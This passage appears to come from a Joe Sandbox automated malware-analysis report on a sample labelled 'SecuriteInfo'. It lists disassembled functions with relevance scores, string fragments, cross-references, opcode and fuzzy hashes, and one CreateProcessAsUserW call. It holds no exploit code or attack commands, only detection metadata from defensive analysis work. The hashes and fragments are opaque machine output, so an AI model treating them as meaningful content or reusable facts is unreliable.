Instruction Fuzzy Hash: 59B308B0A01228CBDB68FF39D99965CBBF2BB99300F0085E9D449A7354DB749E94CF41

Function 06A70040 Relevance: 5.2, Instructions: 5226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1625040125.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25edca3f72620e81ac8f8890b40591e9d04071dbd1e9179852e240d7853c3b44
Instruction ID: f5bd8b91520aff93d77211744561a7523c98f6e62402f7d4c47df45b971f7811
Opcode Fuzzy Hash: 25edca3f72620e81ac8f8890b40591e9d04071dbd1e9179852e240d7853c3b44
Instruction Fuzzy Hash: 08B3E970A012298BDB54FF39D99966DBBF2BB88301F0085E9D489A7368DF345E85CF41

Function 06D32CE8 Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

Q!, xrefs: 06D32F37
$q, xrefs: 06D32D71
Q!, xrefs: 06D32F45

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Q!$Q!$$q
API String ID: 0-1482494776
Opcode ID: 522589fc6ac3274fbe14b217d5acb8b18710d5fee1647d2ddfb2a7da8006ab0c
Instruction ID: c9428aeb50d5c9a2b49015c9f6e2ecef1c512bf1ce6d9d4e27e38ec57b524808
Opcode Fuzzy Hash: 522589fc6ac3274fbe14b217d5acb8b18710d5fee1647d2ddfb2a7da8006ab0c
Instruction Fuzzy Hash: 8071E674E14218DFDB44CFA5D5846AEFBB2FF88300F24942AE506AB354DB305A45CF91

Function 06D4C3A0 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

{ :, xrefs: 06D4C376
tu}s, xrefs: 06D4C328
tu}s, xrefs: 06D4C2F2

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: tu}s$tu}s${ :
API String ID: 0-3169588376
Opcode ID: ba9f206a53a1c3549525dab950357ef9a4bee6dc08e259c7b52df11049b55e67
Instruction ID: 20c830f037ae91f006c5dd508e30907f42b307bd28cf60b2c70bb26f50c22054
Opcode Fuzzy Hash: ba9f206a53a1c3549525dab950357ef9a4bee6dc08e259c7b52df11049b55e67
Instruction Fuzzy Hash: BC414978E11609EFDB44DFA9C584AAEFBF2AF89200F18C5A6D545AB214D7309E01CB91

Function 06D40006 Relevance: 2.9, Instructions: 2942COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbbdd8be1bc039d6a1c3c97c5ac489accc4da58a2d5da8b47e8e1af975e0ea1
Instruction ID: d2146e52fe654d4d6fb1a86bb45a992fa284632df641e78449ef9f8ae42074d9
Opcode Fuzzy Hash: 5bbbdd8be1bc039d6a1c3c97c5ac489accc4da58a2d5da8b47e8e1af975e0ea1
Instruction Fuzzy Hash: 6E436DB0E00218CBCB14FF79D98975DBBF6BB88301F5185A9D448A7354DA38AE88CF55

Function 06A776B8 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

$q, xrefs: 06A776CE
Xq, xrefs: 06A776E7

Memory Dump Source

Source File: 00000000.00000002.1625040125.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: 18b3cab37431515cf926c4745db553a0c2cf49977c6ec150fe6e0c038465fa88
Instruction ID: 48341666d4cc07dc3240fb8ea7e29d21598940dd717202202fca1b5663b98d47
Opcode Fuzzy Hash: 18b3cab37431515cf926c4745db553a0c2cf49977c6ec150fe6e0c038465fa88
Instruction Fuzzy Hash: 18819434F052198FEB58EB74986467E77B2BFC8700B05852DE456E7398CE39C8128791

Function 06D3A248 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

Q+(i, xrefs: 06D3A387
Q+(i, xrefs: 06D3A395

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Q+(i$Q+(i
API String ID: 0-3998099878
Opcode ID: 66f02c81aa83ec6e8ab1467dc3abc04b13acf201ff8215ddf4c361dd695b4ec5
Instruction ID: bc3f05517842a3b865394d9853ea38c06b7c27378a5e4fa99879dae42c2397b3
Opcode Fuzzy Hash: 66f02c81aa83ec6e8ab1467dc3abc04b13acf201ff8215ddf4c361dd695b4ec5
Instruction Fuzzy Hash: 7C81F1B4E01228CFCB54CFA5D9846EEBBB2BF89300F24942AD456BB354DB349945CF94

Function 06D49CC8 Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

Teq, xrefs: 06D49E9A
Teq, xrefs: 06D49D31

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: cb10f5a4db6352b5812ee261316db39fb80b7a724a12e302b486a489cd91654c
Instruction ID: be05677c879044254f2b28d8b8729bdd9509b7e24f7b745e40d30c14289eeae8
Opcode Fuzzy Hash: cb10f5a4db6352b5812ee261316db39fb80b7a724a12e302b486a489cd91654c
Instruction Fuzzy Hash: 0D71B4B4E002198FDB48DFEAD994ADEBBB2FF89300F14852AE915AB354D7349905CF50

Function 06D49CC7 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

Teq, xrefs: 06D49E9A
Teq, xrefs: 06D49D31

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: a451d857470e8bb2bde085483dafc66a3b5d03309c6c83397996b5f049846620
Instruction ID: e72c3230edde1a5906af4d70292c20ff524ad6dd40303801257a0dcc6733d42b
Opcode Fuzzy Hash: a451d857470e8bb2bde085483dafc66a3b5d03309c6c83397996b5f049846620
Instruction Fuzzy Hash: 0171A3B4E002198FDB48DFEAD994ADEBBB2FF88300F14852AE915AB354D7749905CF50

Function 06D49CB9 Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

Teq, xrefs: 06D49E9A
Teq, xrefs: 06D49D31

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 5f30958e7eb746cd3f22fc82165b495b1972e3979c2b7f016d924a410a89047e
Instruction ID: 9269ae95ab568b8ce2932f0af12a90a089a7fcf14b0b055066752bc2cd8c1952
Opcode Fuzzy Hash: 5f30958e7eb746cd3f22fc82165b495b1972e3979c2b7f016d924a410a89047e
Instruction Fuzzy Hash: 7871D374E042598FDB08DFAAD8906EEBBF2FF89300F14816AE955AB354D7349906CF50

Function 06D32CEA Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

$q, xrefs: 06D32D71
Q!, xrefs: 06D32F45

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Q!$$q
API String ID: 0-648432091
Opcode ID: 318a873579a27235a2ac097bc50b70b66ce577f5a8ecab5228c4c3489e88eb98
Instruction ID: 1a18285283f1f0df30ebc2d1aabcbab50bb0a3d9fd8f3313b7b0af23564c80da
Opcode Fuzzy Hash: 318a873579a27235a2ac097bc50b70b66ce577f5a8ecab5228c4c3489e88eb98
Instruction Fuzzy Hash: B771E774E14218DFDB44CFA5E4846AEBBB3FF88300F24852AE506AB354DB305A45CF91

Function 06D39CB0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 06D39E1B

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: e9ae2833c59904cf780bf2c7bd24c2b95dd0ff2d77aced2c0c046781611ec952
Instruction ID: bb426bee9b53786f1e7c8d8b5200f52384c8999f11ffff2544addb49818563e3
Opcode Fuzzy Hash: e9ae2833c59904cf780bf2c7bd24c2b95dd0ff2d77aced2c0c046781611ec952
Instruction Fuzzy Hash: 72510771D0032A9FDB64DF59C840BDDBBB1BF48310F0485AAE918B7250EB759A89CF90

Function 06D480BA Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

<, xrefs: 06D481ED

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 2546edf552e920849e828f31d5c2b146c234017c55950d53ceed98223105d741
Instruction ID: e0b5ad0aa679467a8dad3f3aaf9e5b7fc00efc3da3e1d1a2067d7b7c8bbff4a9
Opcode Fuzzy Hash: 2546edf552e920849e828f31d5c2b146c234017c55950d53ceed98223105d741
Instruction Fuzzy Hash: FB618575E01658CFDB58CFAAC9446DDBBF2AF89301F14C4AAD409AB224DB349A85CF50

Function 063B0006 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624199795.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7fa47680347823833b35c32cd5556196067e1990440f978fac2bf17ea411a2d
Instruction ID: 77911f2d3308fd0bcc07d3850960d339d8539703d91416270fb561b3c3cf1cb5
Opcode Fuzzy Hash: b7fa47680347823833b35c32cd5556196067e1990440f978fac2bf17ea411a2d
Instruction Fuzzy Hash: 8A625F34A00355CFDB24DF28C844B99B7F2BF86314F2582E9D5586F2A1DB71A986CF81

Function 063B0040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624199795.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03c6902913d9b2793c77c6aff3ad08098bdf5838fcd69023a2681acdb9d14a23
Instruction ID: 6aa4f9fa91e4eef75c993db11c5372eb417910a1b8fae9c0c38728bc75d51bc7
Opcode Fuzzy Hash: 03c6902913d9b2793c77c6aff3ad08098bdf5838fcd69023a2681acdb9d14a23
Instruction Fuzzy Hash: BE527D34A00355CFDB24DF28C844B99B7F2BF89314F2582A9D5586F3A1DB71A986CF81

Function 06D4BC61 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7471d82b149f3987b12a3c27f5edead9064fbdb460b1f4d1b80f7ccd506f494
Instruction ID: 708adb285bac0a0b0caf95825e3efb0ab4d2596bb701d82e852be3f0df8a1846
Opcode Fuzzy Hash: c7471d82b149f3987b12a3c27f5edead9064fbdb460b1f4d1b80f7ccd506f494
Instruction Fuzzy Hash: 1BD16A74E0420ADFDB48DFA5D4808AEFBB6FF99300B10D5AAD416AB214D335E942CF94

Function 06D34B01 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df40c8edef1c408bd4002d68aba3fa4dc8c9ff521f090cd5740829c94500a52
Instruction ID: fbf43387c1f9bb6c076737e17a3b4437b760fb082ccdc40afe5096fe44ab73cf
Opcode Fuzzy Hash: 1df40c8edef1c408bd4002d68aba3fa4dc8c9ff521f090cd5740829c94500a52
Instruction Fuzzy Hash: C7D11574E052698FDB64CF25C94479DBBF6BF89340F10DAEAD40EAB214E7709A858F40

Function 06D4BCD0 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445d65d2ffb1902d2ab4f6ca3ed3b06f30e6f32f479a17da9ba91471fe275285
Instruction ID: ac76f7d509cab684648754ba805d27935ddef7e8277e318e8d3d0b1f50489d63
Opcode Fuzzy Hash: 445d65d2ffb1902d2ab4f6ca3ed3b06f30e6f32f479a17da9ba91471fe275285
Instruction Fuzzy Hash: 02C14974E0420ADFDB48DFA5D4808AEFBB2FF99300B20D56AD416AB254D735E942CF90

Function 06D37D68 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd8b9eb388e2b116314a9baf1dceb0ba75e1c5f23ec433c6339f3f97b9fd680d
Instruction ID: 3b56e1e7c2f9369233b470197b5c0ba99cbb29b66d73080265f22438b62e4a99
Opcode Fuzzy Hash: dd8b9eb388e2b116314a9baf1dceb0ba75e1c5f23ec433c6339f3f97b9fd680d
Instruction Fuzzy Hash: 85A132B4E05629CFDB48CFA5D984ADDBBF2FB89300F10952AE50ABB254D7349901CF58

Function 06D37D58 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f877b1419d6ef8758ebfb13736fee1d0b29b5f36d1095fe100db44fea2c573e
Instruction ID: a3184624764d87bc23ad7646121f8fcad0b14667ad04b1fb4aaa78fa73b88b8c
Opcode Fuzzy Hash: 6f877b1419d6ef8758ebfb13736fee1d0b29b5f36d1095fe100db44fea2c573e
Instruction Fuzzy Hash: 9FA135B4E05629CFDB44CFA9D984A9DFBF2FB89300F14852AE50AB7254D7349901CF58

Function 06D343B0 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8507048e8b04b216245d2287aa306ee598f2f29fc6d5f94707b3ae027fe08a52
Instruction ID: a937b4a3848d8dfbb44664869a16f79070b3c26048877ef3618a2553caf25e50
Opcode Fuzzy Hash: 8507048e8b04b216245d2287aa306ee598f2f29fc6d5f94707b3ae027fe08a52
Instruction Fuzzy Hash: C761ABB4D09359AFCB44CFA6D8406AEBFF5EF89300F10C46AD455A7250D7788A46CFA1

Function 06D4A3F0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24212f38bef938a9a548ccf3fa946edeb0bad5b923e0892a1e89dfe9f3d8656
Instruction ID: ac5fe11d1d00593b9f57d9638be7299bf7c5025de6a31fd6d32ee51263e5d357
Opcode Fuzzy Hash: a24212f38bef938a9a548ccf3fa946edeb0bad5b923e0892a1e89dfe9f3d8656
Instruction Fuzzy Hash: AE512B74E046098FDB48DFAAC5446AEFBF2AF88340F28D06AD559A7254D7348E01CFA4

Function 06D37718 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9b19b41d4027460b4a0f6f00f199726bd67370d709da6ddee789ad6cdba5ac
Instruction ID: b09c77168035e918d38a5d06151869f318f53965156c324a6d4c247ad60c18c2
Opcode Fuzzy Hash: da9b19b41d4027460b4a0f6f00f199726bd67370d709da6ddee789ad6cdba5ac
Instruction Fuzzy Hash: 4E6157B4E04629DFDB44CFA5D9886EDBBB6FF89300F10842AE412A7350D7749A05CF94

Function 06D37709 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0452be2fae546d364f223132a55249c91b8923aa23993e618ba1ab42a9219679
Instruction ID: 21afda29a632ab221f65aff744c0960ed391e9f7c8407792511deefb2f07236c
Opcode Fuzzy Hash: 0452be2fae546d364f223132a55249c91b8923aa23993e618ba1ab42a9219679
Instruction Fuzzy Hash: 835168F4E05229DFDB44CFA5C988AAEBBB6FF49300F00842AE412A7350D7749A05CF94

Function 06D4C470 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4df1b695db71385033a14546d8d797567b2e0834f89272cfc552c60bfa94612
Instruction ID: bfd9c143657d1f434d6393aec0905efae57c8d2430b5f65274abf3f1474621fa
Opcode Fuzzy Hash: e4df1b695db71385033a14546d8d797567b2e0834f89272cfc552c60bfa94612
Instruction Fuzzy Hash: 4E510478E112199FDB44CFA9C5849AEBBF2FF8C210F198496D549AB324D734AA41CF90

Function 06D34450 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 811a33960eda2d383c23ea7abffac08d9e1b109d74fb33450fa1e958f408cc10
Instruction ID: 43c1ce9a63cf5a4805d017d8991dc3d6223e0d45c01c962686895dd4276dcec3
Opcode Fuzzy Hash: 811a33960eda2d383c23ea7abffac08d9e1b109d74fb33450fa1e958f408cc10
Instruction Fuzzy Hash: AE4144B4D0521ADFDB84CFA6D9405AEFBF6EF89300F10D42AD561BA210D77886428FA4

Function 06D34452 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df58282b690fbd060bbf54954bb1b3f7801b03e068cf622fd6de96d52a2720ba
Instruction ID: 9b4b707b1d5f0f2f7e4df6d9c2ef15ad59e34b04ad971cedf9750fb212e96c19
Opcode Fuzzy Hash: df58282b690fbd060bbf54954bb1b3f7801b03e068cf622fd6de96d52a2720ba
Instruction Fuzzy Hash: DF4147B4D0521ADFDB44CFA6D8406AEFBF2FF89310F10D42AD551B6250D7788A428FA4

Function 06D4ADC0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8214c5381d67ad22da84f81c7f33c15755fad529e79f222caea11adca1fcbcf4
Instruction ID: adb276e91d61493e7d47eda7b5cc812d142c59695933c4417b8cef1dfdb7075d
Opcode Fuzzy Hash: 8214c5381d67ad22da84f81c7f33c15755fad529e79f222caea11adca1fcbcf4
Instruction Fuzzy Hash: 7A312871E002589BEB18CFAAD8943DEBBF7AFC9300F14C06AD549A6258DB740946CF90

Function 011B5388 Relevance: 17.6, Strings: 14, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LRq, xrefs: 011B5A48
$q, xrefs: 011B57EC
$q, xrefs: 011B5A93
$q, xrefs: 011B543F
LRq, xrefs: 011B5A56
LRq, xrefs: 011B594E
$q, xrefs: 011B549B
LRq, xrefs: 011B595C
8q, xrefs: 011B54BD
$q, xrefs: 011B5431
$q, xrefs: 011B5A85
$q, xrefs: 011B5ABA
$q, xrefs: 011B5AC6
8q, xrefs: 011B54C9

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 8q$8q$LRq$LRq$LRq$LRq$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3583968023
Opcode ID: d7db6166d4f5d48495345796d74b19ddd677b4829d6284f59f1d705e965b72bc
Instruction ID: b725ee929e2e9f11bbf1a632ac65fa8222797f2abf6693eb5afca3d0abad31cc
Opcode Fuzzy Hash: d7db6166d4f5d48495345796d74b19ddd677b4829d6284f59f1d705e965b72bc
Instruction Fuzzy Hash: 3141E770B043198FD7AD9B69949076A7BE3BF88311F26446AD50ADB3A1EF748C018793

Function 011BAAA0 Relevance: 12.7, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 011BAABB
Teq, xrefs: 011BAAE1
Teq, xrefs: 011BAB1D
Teq, xrefs: 011BAB9C
Teq, xrefs: 011BAB66
Teq, xrefs: 011BAD22
Teq, xrefs: 011BABBB
Teq, xrefs: 011BAB4F
Teq, xrefs: 011BAB41
Teq, xrefs: 011BAD41

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Teq$Teq$Teq$Teq$Teq$Teq$Teq$Teq$Teq$Teq
API String ID: 0-1477486416
Opcode ID: 8b3fa03e5bdcdf00b3383f4656c97ef7f0ef5cc895193d4a1c92ad78b88bd219
Instruction ID: 44acaeccfcda965e93395d4eaffafc3ca6b9a27c75752be9c252f9c72eaa080c
Opcode Fuzzy Hash: 8b3fa03e5bdcdf00b3383f4656c97ef7f0ef5cc895193d4a1c92ad78b88bd219
Instruction Fuzzy Hash: 39514F70B14218DFDB1C9BA9F4947EE77A2BF88301F254825E512EB348DB359C42CB92

Function 011B4D58 Relevance: 11.5, Strings: 9, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 011B4E31
8q, xrefs: 011B519C
$q, xrefs: 011B50A8
LRq, xrefs: 011B4F9A
LRq, xrefs: 011B5075
LRq, xrefs: 011B4FAA
8q, xrefs: 011B51A8
$q, xrefs: 011B50D1
$q, xrefs: 011B50DD

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 8q$8q$LRq$LRq$LRq$$q$$q$$q$$q
API String ID: 0-3046471634
Opcode ID: 5c4b55dc4d7ccd79e9d29e7753cb2a55ac3c8b8ba494d0c45dd5dbb1584c0d73
Instruction ID: 10e02763ed2d247861577cd2f18af2229c902187b40f0de6b29f773aaa6dbe62
Opcode Fuzzy Hash: 5c4b55dc4d7ccd79e9d29e7753cb2a55ac3c8b8ba494d0c45dd5dbb1584c0d73
Instruction Fuzzy Hash: B1B15F74E04218CFDB19DB99D481AEDB7B2FF88301F29C516E916AB355CB34AC41CB92

Function 011BAA92 Relevance: 11.4, Strings: 9, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 011BAABB
Teq, xrefs: 011BAAE1
Teq, xrefs: 011BAB1D
Teq, xrefs: 011BAB9C
Teq, xrefs: 011BAB66
Teq, xrefs: 011BAD22
Teq, xrefs: 011BABBB
Teq, xrefs: 011BAB41
Teq, xrefs: 011BAD41

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Teq$Teq$Teq$Teq$Teq$Teq$Teq$Teq$Teq
API String ID: 0-2602561293
Opcode ID: c249ce8e084eb7441ec9cde965b2f317d19cee6523695e25e9426fb6aad465af
Instruction ID: a4ea4afd33f44d52654b954557ac817fc72a263c40bdbe0a1abb8da20f955a96
Opcode Fuzzy Hash: c249ce8e084eb7441ec9cde965b2f317d19cee6523695e25e9426fb6aad465af
Instruction Fuzzy Hash: B3516170B04219DFDB1D9B69F1947ED77A2BF88311F25482AE512EB348DB358C42CB92

Function 011B9DBA Relevance: 7.8, Strings: 6, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dLq, xrefs: 011B9FB7
dLq, xrefs: 011B9F55
dLq, xrefs: 011B9FC5
Yq, xrefs: 011BA08C
dLq, xrefs: 011B9F63
dLq, xrefs: 011B9EE3

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: dLq$dLq$dLq$dLq$dLq$Yq
API String ID: 0-1528512213
Opcode ID: 8f34bd3fa670d21d1a6742b28a4129f16dac86b8698b20409f36660f5b6cd29d
Instruction ID: 8ca953bf99aba0a40f9c0564fdd980f085ee3b699985bd82effdbd3b61f5110b
Opcode Fuzzy Hash: 8f34bd3fa670d21d1a6742b28a4129f16dac86b8698b20409f36660f5b6cd29d
Instruction Fuzzy Hash: D8A16370F002198FDB1C9B69C8D47AEBAA3BFC8714F258069E5069B395CF759C02CB52

Function 011B9410 Relevance: 6.5, Strings: 5, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XXq, xrefs: 011B9697
XXq, xrefs: 011B96E3
XXq, xrefs: 011B964D
XXq, xrefs: 011B9675
XXq, xrefs: 011B9683

Memory Dump Source

